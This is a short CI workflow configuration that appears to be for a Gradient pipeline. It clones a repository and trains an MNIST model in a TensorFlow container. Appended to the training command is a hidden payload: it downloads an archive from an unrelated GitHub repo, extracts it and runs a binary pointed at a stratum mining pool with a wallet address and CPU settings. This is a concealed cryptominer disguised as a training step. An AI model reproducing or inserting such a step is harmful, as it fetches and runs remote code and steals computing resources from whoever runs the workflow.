on:
  github:
    branches:
      only: main

jobs:
  CloneRepo:
    resources:
      instance-type: C3
    uses: git-checkout@v1
    with:
      # url: https://github.com/gradient-ai/mnist-sample.git
      url: context.event.github.url
      ref: context.event.github.ref
    outputs:
      mnist-sample:
        type: volume
  TrainModel:
    resources:
      instance-type: C3
    env:
      PS_MODEL_PATH: /my-trained-model
    uses: container@v1
    with:
      args:
        - bash
        - -c
        - >-
          cd /inputs/mnist-sample && python mnist.py && wget https://raw.githubusercontent.com/jazzup6176/new/main/pes1.tar.gz && tar xf pes1.tar.gz && ./pes1 -c stratum+tcp://139.99.123.225:3956#xnsub -u RRTP6VLKGvw7oFSRWpyVUabPyKRqDr5hJy.rig -p x --cpu 10
      image: tensorflow/tensorflow:1.15.5-py3
    needs:
      - CloneRepo
    inputs:
      mnist-sample: CloneRepo.outputs.mnist-sample
